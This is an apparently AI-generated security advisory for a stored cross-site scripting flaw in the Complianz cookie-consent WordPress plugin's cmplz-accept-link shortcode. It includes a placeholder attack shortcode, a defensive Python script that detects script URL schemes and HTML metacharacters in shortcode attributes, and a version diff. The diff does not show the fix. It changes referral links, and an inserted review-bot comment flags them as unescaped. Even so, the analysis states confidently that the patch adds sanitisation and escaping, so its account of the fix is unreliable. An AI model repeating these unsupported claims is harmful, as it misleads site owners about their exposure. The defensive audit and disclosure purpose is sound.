Atomic Edge Proof of Concept automated generator using AI diff analysis
Published: March 18, 2026

CVE-2025-11185: Complianz | GDPR/CCPA Cookie Consent <= 7.4.3 – Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode (complianz-gdpr)

Severity: Medium (CVSS 6.4)
CWE: 79
Vulnerable Version: 7.4.3
Patched Version: 7.4.4
Disclosed: February 16, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-11185:
This vulnerability is an authenticated stored cross-site scripting (XSS) flaw in the Complianz GDPR/CCPA Cookie Consent WordPress plugin. The vulnerability affects the plugin’s cmplz-accept-link shortcode handler, allowing attackers with contributor-level or higher permissions to inject malicious scripts into pages. These scripts execute when users view the compromised pages, leading to client-side attacks. The CVSS score of 6.4 reflects the moderate impact of this stored XSS vulnerability.

The root cause lies in insufficient input sanitization and output escaping for user-supplied attributes within the cmplz-accept-link shortcode handler. The vulnerability exists because the plugin processes shortcode attributes without properly validating or escaping them before rendering the output. The code diff shows the primary vulnerability location is in the shortcode handling logic, though the specific vulnerable function isn’t directly visible in the provided diff. The vulnerability affects all plugin versions up to and including 7.4.3, as indicated by the version changes in complianz-gpdr.php from 7.4.3 to 7.4.4.

Exploitation requires authenticated access with at least contributor-level permissions. Attackers can inject malicious JavaScript payloads via the cmplz-accept-link shortcode attributes when creating or editing posts or pages. The payload would be crafted within shortcode attributes that bypass any existing sanitization. For example, an attacker could embed a payload like [cmplz-accept-link attribute="malicious_code"] in page content. When WordPress renders the page containing this shortcode, the plugin processes it without adequate escaping, causing the script to execute in visitors’ browsers.

The patch in version 7.4.4 implements proper input sanitization and output escaping for the cmplz-accept-link shortcode attributes. While the exact fix isn’t visible in the provided diff, the version bump and surrounding code changes indicate security improvements. The plugin now validates and escapes user-supplied attribute values before processing them through the shortcode handler. This prevents malicious scripts from being injected into the rendered HTML output. The patch ensures that any JavaScript payloads within shortcode attributes are properly encoded or stripped during output generation.

Successful exploitation allows attackers to execute arbitrary JavaScript in the context of victim users’ browsers. This can lead to session hijacking, account takeover, content defacement, or redirection to malicious sites. Since the XSS is stored, the payload persists and affects all users who view the compromised page. Attackers with contributor access can target administrative users to potentially escalate privileges or perform actions on their behalf. The vulnerability represents a significant risk for WordPress sites using vulnerable versions of the Complianz plugin.
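Because the payload is stored in post content, sites that ran 7.4.3 or earlier can review existing content after upgrading. The following triage script is an added example, not code from the advisory or the plugin: it scans exported post content for cmplz-accept-link shortcodes whose attribute values decode to markup-significant characters or a script URL scheme. The (post_id, content) input shape, the attribute name `text` in the samples, and the sample posts themselves are assumptions constructed for illustration.

```python
"""Audit exported post content for risky cmplz-accept-link shortcode attributes."""
import html
import re

SHORTCODE_TAG = "cmplz-accept-link"  # shortcode named in the advisory

# [cmplz-accept-link ...] with the raw attribute string captured in group 1.
# The lookahead stops a longer tag such as cmplz-accept-link-x from matching.
SHORTCODE_RE = re.compile(
    r"\[" + re.escape(SHORTCODE_TAG) + r"(?![\w-])([^\]]*)\]", re.IGNORECASE
)

# name="value", name='value' or name=bareword
ATTR_RE = re.compile(r"""([\w-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'\]]+))""")

# Review heuristics, not proof of compromise: anything that would matter
# if the value reached HTML without escaping.
CHECKS = (
    ("html-metacharacter", re.compile(r"[<>\"`]")),
    ("script-url-scheme",
     re.compile(r"^\s*(?:javascript|vbscript|data)\s*:", re.IGNORECASE)),
)


def decode_value(raw, max_rounds=3):
    """Undo HTML entity encoding, including double encoding, up to max_rounds."""
    value = raw
    for _ in range(max_rounds):
        decoded = html.unescape(value)
        if decoded == value:
            break
        value = decoded
    return value


def parse_attributes(attr_string):
    """Return {name: raw_value} for every name=value pair in the shortcode."""
    attrs = {}
    for match in ATTR_RE.finditer(attr_string):
        value = next(g for g in match.group(2, 3, 4) if g is not None)
        attrs[match.group(1).lower()] = value
    return attrs


def audit_content(post_id, content):
    """List findings for one post; an empty list means nothing to review."""
    findings = []
    for shortcode in SHORTCODE_RE.finditer(content):
        for name, raw in parse_attributes(shortcode.group(1)).items():
            value = decode_value(raw)
            reasons = [label for label, rx in CHECKS if rx.search(value)]
            if reasons:
                findings.append({
                    "post_id": post_id,
                    "attribute": name,
                    "reasons": reasons,
                    "shortcode": shortcode.group(0),
                })
    return findings


def audit_posts(posts):
    """posts: iterable of (post_id, post_content) pairs from a content export."""
    results = []
    for post_id, content in posts:
        results.extend(audit_content(post_id, content))
    return results


# Constructed sample data: harmless markup stands in for anything unexpected.
SAMPLE_POSTS = [
    (101, 'Intro. [cmplz-accept-link text="Accept marketing cookies"] Outro.'),
    (102, '[cmplz-accept-link text="Accept <b>all</b> cookies"]'),
    (103, "[cmplz-accept-link text='Accept &lt;i&gt;now&lt;/i&gt;']"),
    (104, 'A post with a different shortcode: [gallery ids="1,2"]'),
]

if __name__ == "__main__":
    for finding in audit_posts(SAMPLE_POSTS):
        print(finding["post_id"], finding["attribute"], finding["reasons"])
```

A finding is a prompt for manual review of that post and its revision history, with priority given to content last edited by contributor-level accounts.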

Differential between vulnerable and patched code

Code Diff
--- a/complianz-gdpr/class-admin.php
+++ b/complianz-gdpr/class-admin.php
@@ -209,14 +209,14 @@

 			$support_link = defined( 'cmplz_free' )
 				? "https://wordpress.org/support/plugin/complianz-gdpr"
-				: "https://complianz.io/support";
+				: cmplz_get_referral_url( 'articles', 'plugins-page-support', 'https://complianz.io/support' );
 			$faq_link     = '<a target="_blank" href="' . $support_link . '">'
 			                . __( 'Support', 'complianz-gdpr' ) . '</a>';
 			array_unshift( $links, $faq_link );

 			if ( ! defined( 'cmplz_premium' ) ) {
 				$upgrade_link
-					= '<a style="color:#2DAAE1;font-weight:bold" target="_blank" href="https://complianz.io/l/pricing">'
+					= '<a style="color:#2DAAE1;font-weight:bold" target="_blank" href="' . cmplz_get_referral_url( 'menu', 'plugins-page', 'https://complianz.io/l/pricing' ) . '">'
 					  . __( 'Upgrade to premium', 'complianz-gdpr' ) . '</a>';
 				array_unshift( $links, $upgrade_link );
 			}
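Review bot: Both href values in this hunk are now built from the return value of cmplz_get_referral_url() and concatenated into the markup without escaping: $support_link in the $faq_link anchor and the inline call in $upgrade_link. The old values were string literals, so this was harmless before, but the helper's definition is not part of this diff and its output should be wrapped in esc_url() at the point of output, for example href="' . esc_url( $support_link ) . '". Both links also use target="_blank" without rel="noopener noreferrer", which is worth adding while these lines are being touched.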
--- a/complianz-gdpr/complianz-gpdr.php
+++ b/complianz-gdpr/complianz-gpdr.php
@@ -3,7 +3,7 @@
  * Plugin Name: Complianz | GDPR/CCPA Cookie Consent
  * Plugin URI: https://www.wordpress.org/plugins/complianz-gdpr
  * Description: Complianz Privacy Suite for GDPR, CaCPA, DSVGO, AVG with a conditional cookie warning and customized cookie policy
- * Version: 7.4.3
+ * Version: 7.4.4
  * Requires at least: 5.9
  * Requires PHP: 7.4
  * Text Domain: complianz-gdpr
@@ -302,7 +302,7 @@
 			// for auto upgrade functionality.
 			define( 'CMPLZ_PLUGIN_FREE', plugin_basename( __FILE__ ) );
 			$debug = ( defined( 'SCRIPT_DEBUG' ) && SCRIPT_DEBUG ) ? '#' . time() : '';
-			define( 'CMPLZ_VERSION', '7.4.3' . $debug );
+			define( 'CMPLZ_VERSION', '7.4.4' . $debug );
 			define( 'CMPLZ_PLUGIN_FILE', __FILE__ );
 		}

--- a/complianz-gdpr/config/warnings.php
+++ b/complianz-gdpr/config/warnings.php
@@ -217,273 +217,273 @@
 }

 /** End of Dynamic Notifications */
-
-
 function cmplz_load_warning_types() {
-	return apply_filters('cmplz_warning_types' ,array(
-		'phpversion' => array(
-			'warning_condition' => 'NOT cmplz_has_recommended_phpversion',
-			'urgent' => __( 'Your PHP version is lower than the recommended PHP version. Some features are not available. Support for this PHP version will be dropped soon.', 'complianz-gdpr' ),
-			'url' => 'https://complianz.io/php-version/',
-			'plus_one' => true,
-			'include_in_progress' => true,
-		),
-		'migrate_js' => array(
-			'warning_condition'  => 'get_value_enable_migrate_js==yes',
-			'open' => __( 'Migrate.js, which allowed a smooth upgrade to 6.0, has been deprecated.', 'complianz-gdpr' ),
-			'url' => 'https://complianz.io/migrate-js-deprecated/',
-			'admin_notice' => true,
-		),
-		'enable_quebec_region' => array(
-			'warning_condition'  => 'cmplz_requires_quebec_notice',
-			'open' => cmplz_quebec_notice(),
-			'url' => 'https://complianz.io/quebec-bill-64/',
-			'admin_notice' => true,
-			'dismissible' => true,
-		),
-		// 'new_gutenberg_consentarea' => array(
-		// 	'warning_condition'  => 'cmplz_upgraded_to_current_version',
-		// 	'open' => __( 'New: Gutenberg Block with consent capabilities.', 'complianz-gdpr' ),
-		// 	'admin_notice' => false,
-		// 	'plus_one' => true,
-		// 	'url' => 'https://complianz.io/gutenberg-block-consent/'
-		// ),
-
-		'no-dnt' => array(
-			'success_conditions'  => array(
-				'get_value_respect_dnt==yes'
-			),
-			'completed'    => __( 'Do Not Track and Global Privacy Control are respected.', 'complianz-gdpr' ),
-			// 'open' => __( 'Do Not Track and Global Privacy Control are not yet respected.', 'complianz-gdpr' ),
-			'url' => 'https://complianz.io/browser-privacy-controls/',
-		),
-
-		'ajax_fallback' => array(
-			'warning_condition'  =>'get_option_cmplz_ajax_fallback_active',
-			'urgent' => __( "Please check if your REST API is loading correctly. Your site currently is using the slower Ajax fallback method to load the settings.", 'complianz-gdpr' ),
-			'url' => 'https://complianz.io/instructions/how-to-debug-a-blank-settings-page-in-complianz/',
-			'plus_one' => true,
-		),
-
-		'has_formal' => array(
-			'success_conditions'  => array(
-				'NOT document->locale_has_formal_variant',
-			),
-			'open' =>  __( 'You have currently selected an informal language, which will result in informal use of language on the legal documents. If you prefer the formal style, you can activate this in the general settings.', 'complianz-gdpr' ),
-			'include_in_progress' => true,
-			'url' =>'https://complianz.io/informal-language-in-legal-documents/'
-
-		),
-		'google-fonts' => array(
-			'plus_one' => true,
-			'warning_condition' => 'banner_loader->show_google_fonts_notice',
-			'success_conditions'  => array(
-			),
-			'open' => __( 'Google Fonts requires your attention.', 'complianz-gdpr' ) ." ". __( 'We have added additional support and recommend reviewing your settings.', 'complianz-gdpr' )." " . cmplz_sprintf( __( 'Please read this %sarticle%s to read our position on self-hosting Google Fonts and Privacy by Design.', 'complianz-gdpr' ),  '<a href="http://complianz.io/self-hosting-google-fonts-for-wordpress/" target="_blank">', '</a>'),
-			'include_in_progress' => true,
-			'url' => 'https://complianz.io/self-hosting-google-fonts-for-wordpress/',
-		),
-
-		'cookies-changed' => array(
-			'plus_one' => true,
-			'warning_condition' => 'scan->cookies_changed',
-			'success_conditions'  => array(
-			),
-			'completed'    => __( 'No cookie changes have been detected.', 'complianz-gdpr' ),
-			'open' => __( 'Cookie changes have been detected.', 'complianz-gdpr' ) . " " . __( 'Please review your cookies for changes.', 'complianz-gdpr' ),
-			'include_in_progress' => true,
-		),
-		'no-cookie-scan' => array(
-			'success_conditions'  => array(
-				'banner_loader->get_last_cookie_scan_date',
-			),
-			'completed'    => cmplz_sprintf( __( 'Last site scan completed on %s.', 'complianz-gdpr' ), COMPLIANZ::$banner_loader->get_last_cookie_scan_date() ),
-			'open' => __( 'No site scan has been completed yet.', 'complianz-gdpr' ),
-			'include_in_progress' => true,
-			'dismissible' => false,
-		),
-
-		'all-pages-created' => array(
-			'warning_condition' => 'get_option_cmplz_wizard_completed_once',
-			'success_conditions'  => array(
-				'documents_admin->all_required_pages_created',
-			),
-			'completed'    => __( 'All required pages have been generated.', 'complianz-gdpr' ),
-			'open' => __( 'Not all required pages have been generated.', 'complianz-gdpr' ),
-			'include_in_progress' => true,
-		),
-
-		'hardening' => array(
-			'warning_condition' => 'admin->no_security_plugin_active',
-			'open' =>  __( "Harden your website and quickly detect vulnerabilities with Really Simple Security", 'complianz-gdpr' ),
-			'include_in_progress' => true,
-			'url' => '#tools/security'
-		),
-
-		'ga-needs-configuring'     => array(
-			'warning_condition' => 'banner_loader->uses_google_analytics',
-			'success_conditions'  => array(
-				'banner_loader->analytics_configured',
-			),
-			'open' => __( 'Google Analytics is being used, but is not configured in Complianz.', 'complianz-gdpr' ),
-			'include_in_progress' => true,
-		),
-
-		'gtm-needs-configuring'    => array(
-			'warning_condition' => 'banner_loader->uses_google_tagmanager',
-			'success_conditions'  => array(
-				'banner_loader->tagmanager_configured',
-			),
-			'open' => __( 'Google Tag Manager is being used, but is not configured in Complianz.', 'complianz-gdpr' ),
-			'include_in_progress' => true,
-		),
-
-		'matomo-needs-configuring' => array(
-			'warning_condition' => 'banner_loader->uses_matomo',
-			'success_conditions'  => array(
-				'banner_loader->matomo_configured',
-			),
-			'open' => __( 'Matomo is being used, but is not configured in Complianz.', 'complianz-gdpr' ),
-			'include_in_progress' => true,
-		),
-		'docs-need-updating'       => array(
-			'success_conditions'  => array(
-				'NOT document->documents_need_updating'
-			),
-			'open' => __( 'Your documents have not been updated in the past 12 months. Run the wizard to check your settings.', 'complianz-gdpr' ),
-			'include_in_progress' => true,
-		),
-		'cookies-incomplete'       => array(
-			'warning_condition' => 'NOT banner_loader->use_cdb_api',
-			'success_conditions'  => array(
-				'NOT sync->has_empty_cookie_descriptions',
-			),
-			'open' => __( 'You have cookies with incomplete descriptions.', 'complianz-gdpr' ) . " "
-			          .  __( 'Enable the cookiedatabase.org API for automatic descriptions, or add these manually.', 'complianz-gdpr' ),
-			'include_in_progress' => true,
-			'url' => '#wizard/cookie-descriptions'
-		),
-
-		'double-stats' => array(
-			'success_conditions'  => array(
-				'NOT get_option_cmplz_double_stats',
-			),
-			'warning_condition' => 'cmplz_uses_statistics',
-			'open' => __( 'You have a duplicate implementation of your statistics tool on your site.', 'complianz-gdpr' ) .
-			          __( 'After the issue has been resolved, please re-run a scan to clear this message.', 'complianz-gdpr' ),
-			'include_in_progress' => true,
-			'dismissible' => true,
-			'url' => 'https://complianz.io/duplicate-implementation-of-analytics/',
-		),
-
-		'console-errors' => array(
-			'warning_condition' => 'banner_loader->site_needs_cookie_warning',
-			'success_conditions'  => array(
-				'NOT cmplz_get_console_errors',
-			),
-			'open' => __( 'JavaScript errors are detected on the front-end of your site. This may break the consent banner functionality.', 'complianz-gdpr' )
-			          . '<br />'.__("Last error in the console:", "complianz-gdpr")
-			          .'<div style="color:red">'
-			          . cmplz_get_console_errors()
-			          .'</div>',
-			'include_in_progress' => true,
-			'url' => 'https://complianz.io/cookie-banner-does-not-appear/',
-		),
-
-		'cookie-banner-enabled' => array(
-			'success_conditions'  => array(
-				'cmplz_cookiebanner_should_load(true)',
-			),
-			'completed' => __( 'Your site requires a consent banner, which has been enabled.', 'complianz-gdpr' ),
-			'urgent' => __( 'Your site is not configured to show a consent banner at the moment.', 'complianz-gdpr' ),
-			'include_in_progress' => true,
-			'dismissible' => true,
-			'url' => 'https://complianz.io/cookie-banner-does-not-appear/'
-		),
-
-		'pretty-permalinks-error' => array(
-			'success_conditions'  => array(
-				'get_option_permalink_structure',
-			),
-			'plus_one' => true,
-			'urgent' => __( 'Pretty permalinks are not enabled on your site. This can cause issues with the REST API, used by Complianz.', 'complianz-gdpr' ),
-			'include_in_progress' => true,
-			'dismissible' => false,
-			'url' => admin_url('options-permalink.php'),
-		),
-		'uploads-folder-writable' => array(
-			'success_conditions'  => array(
-				'cmplz_uploads_folder_writable',
-			),
-			'plus_one' => true,
-			'urgent' => __( 'Your uploads folder is not writable. Complianz needs this folder to save the consent banner CSS.', 'complianz-gdpr' ),
-			'include_in_progress' => true,
-			'dismissible' => false,
-			'url' => 'https://complianz.io/folder-permissions/'
-		),
-		'custom-google-maps' => array(
-			'warning_condition' => 'cmplz_uses_google_maps',
-			'success_conditions'  => array(
-				'cmplz_google_maps_integration_enabled',
-			),
-			'plus_one' => false,
-			'open' => __( 'We see you have enabled Google Maps as a service, but we can't find an integration. You can integrate manually if needed.', 'complianz-gdpr' ),
-			'include_in_progress' => true,
-			'url' => 'https://complianz.io/custom-google-maps-integration/',
-		),
-
-		'other-cookie-plugins' => array(
-			'warning_condition'  => 'cmplz_detected_cookie_plugin',
-			'plus_one' => true,
-			'urgent' => cmplz_sprintf(__( 'We have detected the %s plugin on your website.', 'complianz-gdpr' ),cmplz_detected_cookie_plugin(true)).' '.__( 'As Complianz handles all the functionality this plugin provides, you should disable this plugin to prevent unexpected behaviour.', 'complianz-gdpr' ),
-			'include_in_progress' => true,
-			'dismissible' => false,
-		),
-
-		'advertising-enabled' => array(
-			'warning_condition' => 'get_value_uses_ad_cookies==yes',
-			'premium' => __( 'Are you showing ads on your site? Consider implementing TCF.', 'complianz-gdpr' ),
-			'include_in_progress' => false,
-			'dismissible' => false,
-			'url' => 'https://complianz.io/implementing-tcf-on-your-website/',
-		),
-
-		'sync-privacy-statement' => array(
-			'premium' => __( 'Create a Privacy Statement and other Legal Documents with Complianz.', 'complianz-gdpr' ),
-			'include_in_progress' => false,
-			'dismissible' => false,
-			'url' => 'https://complianz.io/pricing/?src=cmplz-plugin',
-		),
+	$warnings = apply_filters(
+		'cmplz_warning_types',
+		array(
+			'phpversion'                     => array(
+				'warning_condition'   => 'NOT cmplz_has_recommended_phpversion',
+				'urgent'              => __( 'Your PHP version is lower than the recommended PHP version. Some features are not available. Support for this PHP version will be dropped soon.', 'complianz-gdpr' ),
+				'url'                 => 'https://complianz.io/php-version/',
+				'plus_one'            => true,
+				'include_in_progress' => true,
+			),
+			'migrate_js'                     => array(
+				'warning_condition' => 'get_value_enable_migrate_js==yes',
+				'open'              => __( 'Migrate.js, which allowed a smooth upgrade to 6.0, has been deprecated.', 'complianz-gdpr' ),
+				'url'               => 'https://complianz.io/migrate-js-deprecated/',
+				'admin_notice'      => true,
+			),
+			'enable_quebec_region'           => array(
+				'warning_condition' => 'cmplz_requires_quebec_notice',
+				'open'              => cmplz_quebec_notice(),
+				'url'               => 'https://complianz.io/quebec-bill-64/',
+				'admin_notice'      => true,
+				'dismissible'       => true,
+			),
+			'no-dnt'                         => array(
+				'success_conditions' => array(
+					'get_value_respect_dnt==yes',
+				),
+				'completed'          => __( 'Do Not Track and Global Privacy Control are respected.', 'complianz-gdpr' ),
+				'url'                => 'https://complianz.io/browser-privacy-controls/',
+			),
+			'ajax_fallback'                  => array(
+				'warning_condition' => 'get_option_cmplz_ajax_fallback_active',
+				'urgent'            => __( 'Please check if your REST API is loading correctly. Your site currently is using the slower Ajax fallback method to load the settings.', 'complianz-gdpr' ),
+				'url'               => 'https://complianz.io/instructions/how-to-debug-a-blank-settings-page-in-complianz/',
+				'plus_one'          => true,
+			),
+			'has_formal'                     => array(
+				'success_conditions'  => array(
+					'NOT document->locale_has_formal_variant',
+				),
+				'open'                => __( 'You have currently selected an informal language, which will result in informal use of language on the legal documents. If you prefer the formal style, you can activate this in the general settings.', 'complianz-gdpr' ),
+				'include_in_progress' => true,
+				'url'                 => 'https://complianz.io/informal-language-in-legal-documents/',
+
+			),
+			'google-fonts'                   => array(
+				'plus_one'            => true,
+				'warning_condition'   => 'banner_loader->show_google_fonts_notice',
+				'success_conditions'  => array(),
+				// translators: %s is a placeholder for the anchor link.
+				'open'                => __( 'Google Fonts requires your attention.', 'complianz-gdpr' ) . ' ' . __( 'We have added additional support and recommend reviewing your settings.', 'complianz-gdpr' ) . ' ' . cmplz_sprintf( __( 'Please read this %1$sarticle%2$s to read our position on self-hosting Google Fonts and Privacy by Design.', 'complianz-gdpr' ), '<a href="https://complianz.io/self-hosting-google-fonts-for-wordpress/" target="_blank">', '</a>' ),
+				'include_in_progress' => true,
+				'url'                 => 'https://complianz.io/self-hosting-google-fonts-for-wordpress/',
+			),
+			'cookies-changed'                => array(
+				'plus_one'            => true,
+				'warning_condition'   => 'scan->cookies_changed',
+				'success_conditions'  => array(),
+				'completed'           => __( 'No cookie changes have been detected.', 'complianz-gdpr' ),
+				'open'                => __( 'Cookie changes have been detected.', 'complianz-gdpr' ) . ' ' . __( 'Please review your cookies for changes.', 'complianz-gdpr' ),
+				'include_in_progress' => true,
+			),
+			'no-cookie-scan'                 => array(
+				'success_conditions'  => array(
+					'banner_loader->get_last_cookie_scan_date',
+				),
+				// translators: %s is a placeholder for the last scan completed date.
+				'completed'           => cmplz_sprintf( __( 'Last site scan completed on %s.', 'complianz-gdpr' ), COMPLIANZ::$banner_loader->get_last_cookie_scan_date() ),
+				'open'                => __( 'No site scan has been completed yet.', 'complianz-gdpr' ),
+				'include_in_progress' => true,
+				'dismissible'         => false,
+			),
+			'all-pages-created'              => array(
+				'warning_condition'   => 'get_option_cmplz_wizard_completed_once',
+				'success_conditions'  => array(
+					'documents_admin->all_required_pages_created',
+				),
+				'completed'           => __( 'All required pages have been generated.', 'complianz-gdpr' ),
+				'open'                => __( 'Not all required pages have been generated.', 'complianz-gdpr' ),
+				'include_in_progress' => true,
+			),
+			'hardening'                      => array(
+				'warning_condition'   => 'admin->no_security_plugin_active',
+				'open'                => __( 'Harden your website and quickly detect vulnerabilities with Really Simple Security', 'complianz-gdpr' ),
+				'include_in_progress' => true,
+				'url'                 => '#tools/security',
+			),
+			'ga-needs-configuring'           => array(
+				'warning_condition'   => 'banner_loader->uses_google_analytics',
+				'success_conditions'  => array(
+					'banner_loader->analytics_configured',
+				),
+				'open'                => __( 'Google Analytics is being used, but is not configured in Complianz.', 'complianz-gdpr' ),
+				'include_in_progress' => true,
+			),
+			'gtm-needs-configuring'          => array(
+				'warning_condition'   => 'banner_loader->uses_google_tagmanager',
+				'success_conditions'  => array(
+					'banner_loader->tagmanager_configured',
+				),
+				'open'                => __( 'Google Tag Manager is being used, but is not configured in Complianz.', 'complianz-gdpr' ),
+				'include_in_progress' => true,
+			),
+			'matomo-needs-configuring'       => array(
+				'warning_condition'   => 'banner_loader->uses_matomo',
+				'success_conditions'  => array(
+					'banner_loader->matomo_configured',
+				),
+				'open'                => __( 'Matomo is being used, but is not configured in Complianz.', 'complianz-gdpr' ),
+				'include_in_progress' => true,
+			),
+			'docs-need-updating'             => array(
+				'success_conditions'  => array(
+					'NOT document->documents_need_updating',
+				),
+				'open'                => __( 'Your documents have not been updated in the past 12 months. Run the wizard to check your settings.', 'complianz-gdpr' ),
+				'include_in_progress' => true,
+			),
+			'cookies-incomplete'             => array(
+				'warning_condition'   => 'NOT banner_loader->use_cdb_api',
+				'success_conditions'  => array(
+					'NOT sync->has_empty_cookie_descriptions',
+				),
+				'open'                => __( 'You have cookies with incomplete descriptions.', 'complianz-gdpr' ) . ' '
+							. __( 'Enable the cookiedatabase.org API for automatic descriptions, or add these manually.', 'complianz-gdpr' ),
+				'include_in_progress' => true,
+				'url'                 => '#wizard/cookie-descriptions',
+			),
+			'double-stats'                   => array(
+				'success_conditions'  => array(
+					'NOT get_option_cmplz_double_stats',
+				),
+				'warning_condition'   => 'cmplz_uses_statistics',
+				'open'                => __( 'You have a duplicate implementation of your statistics tool on your site.', 'complianz-gdpr' ) .
+							__( 'After the issue has been resolved, please re-run a scan to clear this message.', 'complianz-gdpr' ),
+				'include_in_progress' => true,
+				'dismissible'         => true,
+				'url'                 => 'https://complianz.io/duplicate-implementation-of-analytics/',
+			),
+			'console-errors'                 => array(
+				'warning_condition'   => 'banner_loader->site_needs_cookie_warning',
+				'success_conditions'  => array(
+					'NOT cmplz_get_console_errors',
+				),
+				'open'                => __( 'JavaScript errors are detected on the front-end of your site. This may break the consent banner functionality.', 'complianz-gdpr' )
+							. '<br />' . __( 'Last error in the console:', 'complianz-gdpr' )
+							. '<div style="color:red">'
+							. cmplz_get_console_errors()
+							. '</div>',
+				'include_in_progress' => true,
+				'url'                 => 'https://complianz.io/cookie-banner-does-not-appear/',
+			),
+			'cookie-banner-enabled'          => array(
+				'success_conditions'  => array(
+					'cmplz_cookiebanner_should_load(true)',
+				),
+				'completed'           => __( 'Your site requires a consent banner, which has been enabled.', 'complianz-gdpr' ),
+				'urgent'              => __( 'Your site is not configured to show a consent banner at the moment.', 'complianz-gdpr' ),
+				'include_in_progress' => true,
+				'dismissible'         => true,
+				'url'                 => 'https://complianz.io/cookie-banner-does-not-appear/',
+			),
+			'pretty-permalinks-error'        => array(
+				'success_conditions'  => array(
+					'get_option_permalink_structure',
+				),
+				'plus_one'            => true,
+				'urgent'              => __( 'Pretty permalinks are not enabled on your site. This can cause issues with the REST API, used by Complianz.', 'complianz-gdpr' ),
+				'include_in_progress' => true,
+				'dismissible'         => false,
+				'url'                 => admin_url( 'options-permalink.php' ),
+			),
+			'uploads-folder-writable'        => array(
+				'success_conditions'  => array(
+					'cmplz_uploads_folder_writable',
+				),
+				'plus_one'            => true,
+				'urgent'              => __( 'Your uploads folder is not writable. Complianz needs this folder to save the consent banner CSS.', 'complianz-gdpr' ),
+				'include_in_progress' => true,
+				'dismissible'         => false,
+				'url'                 => 'https://complianz.io/folder-permissions/',
+			),
+			'custom-google-maps'             => array(
+				'warning_condition'   => 'cmplz_uses_google_maps',
+				'success_conditions'  => array(
+					'cmplz_google_maps_integration_enabled',
+				),
+				'plus_one'            => false,
+				'open'                => __( 'We see you have enabled Google Maps as a service, but we can't find an integration. You can integrate manually if needed.', 'complianz-gdpr' ),
+				'include_in_progress' => true,
+				'url'                 => 'https://complianz.io/custom-google-maps-implementation/',
+			),
+			'other-cookie-plugins'           => array(
+				'warning_condition'   => 'cmplz_detected_cookie_plugin',
+				'plus_one'            => true,
+				// translators: %s is a placeholder for the compliance detected plugin name.
+				'urgent'              => cmplz_sprintf( __( 'We have detected the %s plugin on your website.', 'complianz-gdpr' ), cmplz_detected_cookie_plugin( true ) ) . ' ' . __( 'As Complianz handles all the functionality this plugin provides, you should disable this plugin to prevent unexpected behaviour.', 'complianz-gdpr' ),
+				'include_in_progress' => true,
+				'dismissible'         => false,
+			),
+			'advertising-enabled'            => array(
+				'warning_condition'   => 'get_value_uses_ad_cookies==yes',
+				'premium'             => __( 'Are you showing ads on your site? Consider implementing TCF.', 'complianz-gdpr' ),
+				'include_in_progress' => false,
+				'dismissible'         => false,
+				'url'                 => 'https://complianz.io/implementing-tcf-on-your-website/',
+			),
+			'sync-privacy-statement'         => array(
+				'premium'             => __( 'Create a Privacy Statement and other Legal Documents with Complianz.', 'complianz-gdpr' ),
+				'include_in_progress' => false,
+				'dismissible'         => false,
+				'url'                 => 'https://complianz.io/pricing/',
+			),
+			'ecommerce-legal'                => array(
+				'warning_condition'   => 'cmplz_ecommerce_legal',
+				'premium'             => __( 'Legal compliance for webshops.', 'complianz-gdpr' ),
+				'include_in_progress' => false,
+				'dismissible'         => false,
+				'url'                 => 'https://complianz.io/legal-compliance-for-ecommerce/',
+			),
+			'configure-tag-manager'          => array(
+				'warning_condition'   => 'cmplz_uses_google_tagmanager_or_analytics',
+				'premium'             => __( 'Learn more about Google Consent Mode V2.', 'complianz-gdpr' ),
+				'include_in_progress' => false,
+				'dismissible'         => false,
+				'url'                 => 'https://complianz.io/consent-mode-for-7-0/',
+			),
+			'targeting-multiple-regions'     => array(
+				'warning_condition'   => 'cmplz_targeting_multiple_regions',
+				'premium'             => __( 'Are you targeting multiple regions?', 'complianz-gdpr' ),
+				'include_in_progress' => false,
+				'dismissible'         => false,
+				'url'                 => 'https://complianz.io/what-regions-do-i-target/',
+			),
+			'textdomain-just-in-time-notice' => array(
+				'dismissible'         => true,
+				'open'                => __( 'You might see a notice about Complianz when debugging your WordPress website. Although not a breaking issue, pleasee know we're attending to this issue.', 'complianz-gdpr' ),
+				'warning_condition'   => ( defined( 'WP_DEBUG' ) && WP_DEBUG ) ? '_true_' : '_false_',
+				'include_in_progress' => false,
+				'url'                 => 'https://complianz.io/about-function-_load_textdomain_just_in_time-was-called-incorrectly/',
+			),
+			'clarity-consent-mode'           => array(
+				'plus_one'          => true,
+				'dismissable'       => true,
+				'warning_condition' => 'get_value_compile_statistics==clarity',
+				'open'              => __( 'Clarity Consent Mode V2 is now available. Please enable it in the wizard.', 'complianz-gdpr' ),
+				'url'               => '#wizard/statistics-configuration',
+			),
+		)
+	);

-		'ecommerce-legal' => array(
-			'warning_condition' => 'cmplz_ecommerce_legal',
-			'premium' => __( 'Legal compliance for webshops.', 'complianz-gdpr' ),
-			'include_in_progress' => false,
-			'dismissible' => false,
-			'url' => 'https://complianz.io/legal-compliance-for-ecommerce/',
-		),
+	return cmplz_add_referral_to_warnings( $warnings );
+}

-		'configure-tag-manager' => array(
-			'warning_condition' => 'cmplz_uses_google_tagmanager_or_analytics',
-			'premium' => __( 'Learn more about Google Consent Mode V2.', 'complianz-gdpr' ),
-			'include_in_progress' => false,
-			'dismissible' => false,
-			'url' => 'https://complianz.io/consent-mode-for-7-0/'
-		),
+/**
+ * Add referral parameters to premium field upgrade links
+ *
+ * @param array $fields Fields array.
+ * @return array Modified fields with referral parameters.
+ */
+function cmplz_add_referral_to_warnings( $fields ) {
+	foreach ( $fields as $key => &$field ) {
+		if ( isset( $field['url'] ) && strpos( $field['url'], 'complianz.io' ) !== false ) {
+			$field['url'] = cmplz_get_referral_url( 'warnings', $key, $field['url'] );
+		}
+	}

-		'targeting-multiple-regions' => array(
-			'warning_condition' => 'cmplz_targeting_multiple_regions',
-			'premium' => __( 'Are you targeting multiple regions?', 'complianz-gdpr' ),
-			'include_in_progress' => false,
-			'dismissible' => false,
-			'url' => 'https://complianz.io/what-regions-do-i-target/',
-		),
-		'textdomain-just-in-time-notice' => array(
-			'dismissible' => true,
-			'open' => __( 'You might see a notice about Complianz when debugging your WordPress website. Although not a breaking issue, pleasee know we're attending to this issue.', 'complianz-gdpr' ),
-			'warning_condition' => (defined('WP_DEBUG') && WP_DEBUG) ? '_true_' : '_false_',
-			'include_in_progress' => false,
-			'url' => 'https://complianz.io/doing-it-wrong-notice',
-		)
-	) );
+	return $fields;
 }
